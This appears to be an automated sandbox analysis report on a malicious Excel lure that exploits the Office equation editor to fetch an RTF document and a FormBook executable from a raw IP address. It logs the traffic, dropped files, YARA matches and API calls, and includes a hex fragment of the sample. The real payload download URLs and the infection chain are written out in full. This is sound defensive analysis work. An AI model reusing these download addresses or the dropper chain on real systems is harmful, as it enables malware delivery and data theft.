20 00 00 00 78 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 a0 0e 00 00 08 00 00 00 7a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 82 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd 95 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 04 05 01 00 4c 55 00 00 03 00 00 00 49 00 00 06 50 5a 01 00 d8 12 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 2a c2 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 02 03 7d 01 00 00 04 2a 00 1b 30 03 00 82 00 00 00 01 00 00 11 00 14 0a 00 72 03 00 00 70 73 16 00 00 0a 0a 06 6f 17 00 00 0a 00 72 ba 00 00 70 0b 07 06 73 18 00 00 0a 0c 73 19 00 00 0a 0d 08 73 1a 00 00 0a 13 04 11 04 09 6f 1b 00 00 0a 26 02 09 6f 1c 00 00 0a 16 6f 1d 00 00 0a 7d 04 00 00 04 02 7b 06 00 00 04 02 7b 04 00 00 04 6f 1e 00 00 0a 00 00 de 13 13 05 00 11 05 6f 1f 00 00 0a 28 20 00 00 0a 26 00 de 00 de 0a 00 06 6f 21 00 00 0a 00 00 dc 2a 00 00 01 1c 00 00 00 00 03 00 5f 62 00 13 20 00 00 01 02 00 03 00 74 77 00 0a 00 00 00 00 13 30 04 00 c2 00 00 00 02 00 00 11 00 02 7b 07 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: GET /dGa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\530AFBE1.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /dGa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: tny.wtf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 10:42:43 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uulhEEiOXoGYlZKlmb7SClhCYxU3NtgRhPNKtJluJpWOvx9ZuS%2Br%2FBuSb0b09MXIxBNU3%2BrDH%2Fx63ADu3v8wftWYGOO2kAeRv0Ygjnlbg3OOOf2BmotdEBOM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93c8dc7946c431-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 10:42:44 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=El%2Br9sSKHqmmdHwhLPqywED1VjWGqYnttXLHjgYMPuW9%2FtpQHKub02g89K8uueu1%2BQYXwsUFO%2FqG5NSlk0rGVTUWs5iyDMzalfipJkR9ovf%2FMT8kYr7VV%2Bd2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93c8e53feac431-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 10:42:44 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyO6%2BzgN0Mm%2BV44JN4%2FyHHrzm9PgUI%2B%2Bcys2y5e6Xp6cajkzVZEGkoCNBI89MNUniNZwquOUZ0JL4blO%2B6ltgVzh%2FKssGJdZqdVIzHxH6YD4lH0nYymppcTz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93c8e62886c431-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 10:42:49 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWapKren%2FOs5%2F5eohyukmtsXHWSC1mFOvG3cz%2BxV5nO43wK1zPVKyYK%2F%2FDggmUyTaiz7BojaE1u5ZY7gahkitPMRKlYG%2FZeAoNUuVI3AzIs8mP0hxWao4om2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93c902d92732e2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 10:42:49 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWapKren%2FOs5%2F5eohyukmtsXHWSC1mFOvG3cz%2BxV5nO43wK1zPVKyYK%2F%2FDggmUyTaiz7BojaE1u5ZY7gahkitPMRKlYG%2FZeAoNUuVI3AzIs8mP0hxWao4om2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93c902d92732e2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000006.00000002.439733096.000000000056F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000006.00000002.439733096.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exe
                Source: EQNEDT32.EXE, 00000006.00000002.439733096.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.execC:
                Source: EQNEDT32.EXE, 00000006.00000002.439733096.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exej
                Source: EQNEDT32.EXE, 00000006.00000002.439733096.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exekkC:
                Source: tny.wtf.url.3.drString found in binary or memory: http://tny.wtf/
                Source: RFQ#51281AOLAI.xls, dGa.url.3.drString found in binary or memory: http://tny.wtf/dGa
                Source: 45930000.0.dr, ~DF2F5EA4D2F53E3BDB.TMP.0.drString found in binary or memory: http://tny.wtf/dGayX

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9D5C678.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Excel sheet contains many unusual embedded objects
                Source: RFQ#51281AOLAI.xlsOLE: Microsoft Excel 2007+
                Source: 45930000.0.drOLE: Microsoft Excel 2007+
                Source: ~DFA1D41AEDA01093E0.TMP.0.drOLE: Microsoft Excel 2007+
                Microsoft Office drops suspicious files
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dGa.urlJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.urlJump to behavior
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0042BEE3 NtClose,9_2_0042BEE3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009507AC NtCreateMutant,LdrInitializeThunk,9_2_009507AC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094F9F0 NtClose,LdrInitializeThunk,9_2_0094F9F0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_0094FAE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0094FB68
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_0094FDC0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009500C4 NtCreateFile,9_2_009500C4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00950048 NtProtectVirtualMemory,9_2_00950048
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00950078 NtResumeThread,9_2_00950078
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00950060 NtQuerySection,9_2_00950060
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009501D4 NtSetValueKey,9_2_009501D4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0095010C NtOpenDirectoryObject,9_2_0095010C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00950C40 NtGetContextThread,9_2_00950C40
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009510D0 NtOpenProcessToken,9_2_009510D0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00951148 NtOpenThread,9_2_00951148
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094F8CC NtWaitForSingleObject,9_2_0094F8CC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094F900 NtReadFile,9_2_0094F900
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00951930 NtSetContextThread,9_2_00951930
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094F938 NtWriteFile,9_2_0094F938
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FAB8 NtQueryValueKey,9_2_0094FAB8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FAD0 NtAllocateVirtualMemory,9_2_0094FAD0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FA20 NtQueryInformationFile,9_2_0094FA20
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FA50 NtEnumerateValueKey,9_2_0094FA50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FBB8 NtQueryInformationToken,9_2_0094FBB8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FBE8 NtQueryVirtualMemory,9_2_0094FBE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FB50 NtCreateKey,9_2_0094FB50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FC90 NtUnmapViewOfSection,9_2_0094FC90
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FC30 NtOpenProcess,9_2_0094FC30
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FC48 NtSetInformationFile,9_2_0094FC48
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FC60 NtMapViewOfSection,9_2_0094FC60
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00951D80 NtSuspendThread,9_2_00951D80
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FD8C NtDelayExecution,9_2_0094FD8C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FD5C NtEnumerateKey,9_2_0094FD5C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FEA0 NtReadVirtualMemory,9_2_0094FEA0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FED0 NtAdjustPrivilegesToken,9_2_0094FED0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FE24 NtWriteVirtualMemory,9_2_0094FE24
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FFB4 NtCreateSection,9_2_0094FFB4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FFFC NtCreateProcessEx,9_2_0094FFFC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0094FF34 NtQueueApcThread,9_2_0094FF34
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_004304C88_2_004304C8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00433D988_2_00433D98
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_004311688_2_00431168
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00433B388_2_00433B38
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E81DE88_2_01E81DE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E819C08_2_01E819C0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E819B18_2_01E819B1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E82B408_2_01E82B40
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E82B508_2_01E82B50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E827098_2_01E82709
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E827188_2_01E82718
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E822208_2_01E82220
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_01E822308_2_01E82230
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004014209_2_00401420
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004010009_2_00401000
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004011549_2_00401154
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004011609_2_00401160
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00416A4E9_2_00416A4E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00416A539_2_00416A53
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FCCB9_2_0040FCCB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FCD39_2_0040FCD3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0042E5239_2_0042E523
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FEF39_2_0040FEF3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040DF739_2_0040DF73
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00402FD09_2_00402FD0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0095E0C69_2_0095E0C6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0095E2E99_2_0095E2E9
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A063BF9_2_00A063BF
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009863DB9_2_009863DB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009623059_2_00962305
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AA37B9_2_009AA37B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E443E9_2_009E443E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097C5F09_2_0097C5F0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E05E39_2_009E05E3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009A65409_2_009A6540
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009646809_2_00964680
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0096E6C19_2_0096E6C1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A026229_2_00A02622
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AA6349_2_009AA634
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0096C7BC9_2_0096C7BC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0096C85C9_2_0096C85C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0098286D9_2_0098286D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009629B29_2_009629B2
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A0098E9_2_00A0098E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009769FE9_2_009769FE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009F49F59_2_009F49F5
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AC9209_2_009AC920
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A0CBA49_2_00A0CBA4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E6BCB9_2_009E6BCB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A02C9C9_2_00A02C9C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009EAC5E9_2_009EAC5E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00990D3B9_2_00990D3B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0096CD5B9_2_0096CD5B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00992E2F9_2_00992E2F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097EE4C9_2_0097EE4C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009FCFB19_2_009FCFB1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009D2FDC9_2_009D2FDC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00970F3F9_2_00970F3F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0098D0059_2_0098D005
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097905A9_2_0097905A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009630409_2_00963040
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009DD06D9_2_009DD06D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009ED13F9_2_009ED13F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A012389_2_00A01238
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0095F3CF9_2_0095F3CF
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009673539_2_00967353
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009954859_2_00995485
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009714899_2_00971489
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0099D47D9_2_0099D47D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A035DA9_2_00A035DA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0096351F9_2_0096351F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E579A9_2_009E579A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009957C39_2_009957C3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009F771D9_2_009F771D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009DF8C49_2_009DF8C4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009FF8EE9_2_009FF8EE
